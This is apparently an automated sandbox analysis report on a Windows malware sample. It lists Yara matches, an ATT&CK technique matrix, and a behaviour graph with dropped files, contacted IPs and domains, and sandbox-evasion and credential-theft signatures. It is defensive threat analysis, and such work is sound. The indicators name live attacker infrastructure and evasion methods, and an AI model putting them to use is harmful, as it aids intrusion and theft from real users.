                            Source: Yara matchFile source: 0000000F.00000003.1991761925.0000000001246000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1372532906.0000000001458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000003.1957093991.0000000001239000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000003.2045528163.0000000001246000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000003.1972196562.0000000001239000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000003.2076735987.0000000001249000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1372723744.0000000001458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: AApUa7VQiy.exe PID: 7488, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: ktIplF5.exe PID: 4272, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: Process Memory Space: AApUa7VQiy.exe PID: 7488, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: ktIplF5.exe PID: 4272, type: MEMORYSTR
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 0000000C.00000002.2766438930.0000000002B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.2769111008.0000000002BD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: flv2aviconverter24.exe PID: 2400, type: MEMORYSTR
                            Source: Yara matchFile source: 00000003.00000002.1533551948.0000000000691000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1492478453.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.1536146790.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ES0PERDCSSGNQK1XTMK282189FFMR8.exe PID: 7892, type: MEMORYSTR
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                            Windows Management Instrumentation
                            1
                            DLL Side-Loading
                            1
                            DLL Side-Loading
                            1
                            Disable or Modify Tools
                            2
                            OS Credential Dumping
                            1
                            System Time Discovery
                            Remote Services11
                            Archive Collected Data
                            12
                            Ingress Tool Transfer
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Native API
                            1
                            Windows Service
                            1
                            Windows Service
                            111
                            Deobfuscate/Decode Files or Information
                            LSASS Memory12
                            File and Directory Discovery
                            Remote Desktop Protocol41
                            Data from Local System
                            11
                            Encrypted Channel
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Command and Scripting Interpreter
                            1
                            Scheduled Task/Job
                            12
                            Process Injection
                            41
                            Obfuscated Files or Information
                            Security Account Manager246
                            System Information Discovery
                            SMB/Windows Admin SharesData from Network Shared Drive1
                            Non-Standard Port
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts1
                            Scheduled Task/Job
                            11
                            Registry Run Keys / Startup Folder
                            1
                            Scheduled Task/Job
                            22
                            Software Packing
                            NTDS1
                            Query Registry
                            Distributed Component Object ModelInput Capture3
                            Non-Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud Accounts2
                            PowerShell
                            Network Logon Script11
                            Registry Run Keys / Startup Folder
                            1
                            Timestomp
                            LSA Secrets1071
                            Security Software Discovery
                            SSHKeylogging124
                            Application Layer Protocol
                            Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            DLL Side-Loading
                            Cached Domain Credentials3
                            Process Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                            Masquerading
                            DCSync461
                            Virtualization/Sandbox Evasion
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job461
                            Virtualization/Sandbox Evasion
                            Proc Filesystem1
                            Application Window Discovery
                            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                            Process Injection
                            /etc/passwd and /etc/shadow2
                            System Owner/User Discovery
                            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1604525 Sample: AApUa7VQiy.exe Startdate: 01/02/2025 Architecture: WINDOWS Score: 100 158 UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC 2->158 160 DGGKjBirXBdcY.DGGKjBirXBdcY 2->160 162 37 other IPs or domains 2->162 194 Suricata IDS alerts for network traffic 2->194 196 Found malware configuration 2->196 198 Antivirus detection for URL or domain 2->198 200 27 other signatures 2->200 14 skotes.exe 2 54 2->14         started        19 AApUa7VQiy.exe 2 2->19         started        21 skotes.exe 2->21         started        signatures3 process4 dnsIp5 168 185.215.113.43, 53457, 53464, 53466 WHOLESALECONNECTIONSNL Portugal 14->168 170 185.215.113.97, 53467, 53472, 53477 WHOLESALECONNECTIONSNL Portugal 14->170 172 91.240.118.49, 443, 53465 GLOBALLAYERNL unknown 14->172 142 C:\Users\user\AppData\...\6299d9e5a5.exe, PE32 14->142 dropped 144 C:\Users\user\AppData\...\513076b4b2.exe, PE32 14->144 dropped 146 C:\Users\user\AppData\...\d37c6a3c82.exe, PE32 14->146 dropped 152 25 other malicious files 14->152 dropped 178 Creates multiple autostart registry keys 14->178 180 Hides threads from debuggers 14->180 182 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->182 23 infinity.exe 2 14->23         started        26 f46bdbcca4.exe 14->26         started        29 179187318e.exe 14->29         started        36 3 other processes 14->36 174 185.215.113.16, 49776, 80 WHOLESALECONNECTIONSNL Portugal 19->174 176 warlikedbeliev.org 104.21.18.116, 443, 49707, 49708 CLOUDFLARENETUS United States 19->176 148 C:\...S0PERDCSSGNQK1XTMK282189FFMR8.exe, PE32 19->148 dropped 150 C:\Users\...\BEB973FPO2R62ZWABVOVP8TC.exe, PE32 19->150 dropped 184 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->184 186 Query firmware table information (likely to detect VMs) 19->186 188 Found many strings related to Crypto-Wallets (likely being stolen) 19->188 192 4 other signatures 19->192 31 BEB973FPO2R62ZWABVOVP8TC.exe 4 19->31         started        33 ES0PERDCSSGNQK1XTMK282189FFMR8.exe 13 19->33         started        190 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 21->190 file6 signatures7 process8 dnsIp9 116 C:\Users\user\AppData\Local\...\infinity.tmp, PE32 23->116 dropped 38 infinity.tmp 18 26 23->38         started        118 C:\Users\user\AppData\...\f46bdbcca4.tmp, PE32 26->118 dropped 202 Multi AV Scanner detection for dropped file 26->202 41 f46bdbcca4.tmp 26->41         started        120 C:\Users\user\AppData\Local\Temp\Put, data 29->120 dropped 122 C:\Users\user\AppData\Local\Temp\Japanese, data 29->122 dropped 130 5 other malicious files 29->130 dropped 204 Writes many files with high entropy 29->204 43 cmd.exe 29->43         started        124 C:\Users\user\AppData\Local\...\skotes.exe, PE32 31->124 dropped 206 Detected unpacking (changes PE section rights) 31->206 208 Tries to evade debugger and weak emulator (self modifying code) 31->208 210 Hides threads from debuggers 31->210 46 skotes.exe 31->46         started        154 185.215.113.115, 53302, 80 WHOLESALECONNECTIONSNL Portugal 33->154 212 Tries to detect virtualization through RDTSC time measurements 33->212 214 Tries to detect sandboxes / dynamic malware analysis system (registry check) 33->214 216 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 33->216 156 steamcommunity.com 104.102.49.254, 443, 53481 AKAMAI-ASUS United States 36->156 126 C:\Users\user\AppData\Local\Temp\Soundtrack, data 36->126 dropped 128 C:\Users\user\AppData\Local\Temp\Plumbing, data 36->128 dropped 132 3 other malicious files 36->132 dropped 218 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 36->218 220 Query firmware table information (likely to detect VMs) 36->220 222 Tries to detect sandboxes and other dynamic analysis tools (window names) 36->222 224 4 other signatures 36->224 48 cmd.exe 36->48         started        file10 signatures11 process12 file13 98 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 38->98 dropped 100 C:\Users\user\AppData\...\unins000.exe (copy), PE32 38->100 dropped 102 C:\Users\user\AppData\Local\...\is-2E87P.tmp, PE32 38->102 dropped 114 21 other files (11 malicious) 38->114 dropped 50 flv2aviconverter24.exe 38->50         started        104 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 41->104 dropped 106 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 41->106 dropped 108 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 41->108 dropped 54 f46bdbcca4.exe 41->54         started        110 C:\Users\user\AppData\Local\...\Avoiding.com, PE32 43->110 dropped 226 Drops PE files with a suspicious file extension 43->226 228 Writes many files with high entropy 43->228 56 cmd.exe 43->56         started        58 conhost.exe 43->58         started        60 tasklist.exe 43->60         started        67 9 other processes 43->67 230 Detected unpacking (changes PE section rights) 46->230 232 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 46->232 234 Tries to evade debugger and weak emulator (self modifying code) 46->234 236 3 other signatures 46->236 112 C:\Users\user\AppData\...\Macromedia.com, PE32 48->112 dropped 62 Macromedia.com 48->62         started        65 cmd.exe 48->65         started        69 10 other processes 48->69 signatures14 process15 dnsIp16 164 176.113.115.96 SELECTELRU Russian Federation 50->164 166 193.176.153.180 AGROSVITUA unknown 50->166 84 C:\ProgramData\Flv2AVIConverter\sqlite3.dll, PE32 50->84 dropped 86 C:\ProgramData\...\Flv2AVIConverter.exe, PE32 50->86 dropped 88 C:\Users\user\AppData\...\f46bdbcca4.tmp, PE32 54->88 dropped 71 f46bdbcca4.tmp 54->71         started        90 C:\Users\user\AppData\Local\Temp\36469\L, data 56->90 dropped 92 C:\Users\user\AppData\...\AchillesGuard.com, PE32 62->92 dropped 94 C:\Users\user\AppData\Local\...\r, data 62->94 dropped 242 Drops PE files with a suspicious file extension 62->242 244 Writes many files with high entropy 62->244 96 C:\Users\user\AppData\Local\Temp\764661\F, data 65->96 dropped file17 signatures18 process19 file20 134 C:\Users\user\...\uxtheme_2.drv (copy), PE32+ 71->134 dropped 136 C:\Users\user\AppData\Roaming\is-M72JG.tmp, PE32+ 71->136 dropped 138 C:\Users\user\AppData\...\unins000.exe (copy), PE32 71->138 dropped 140 4 other files (3 malicious) 71->140 dropped 74 regsvr32.exe 71->74         started        process21 process22 76 regsvr32.exe 74->76         started        signatures23 238 Suspicious powershell command line found 76->238 240 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 76->240 79 powershell.exe 76->79         started        process24 signatures25 246 Loading BitLocker PowerShell Module 79->246 82 conhost.exe 79->82         started        process26

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.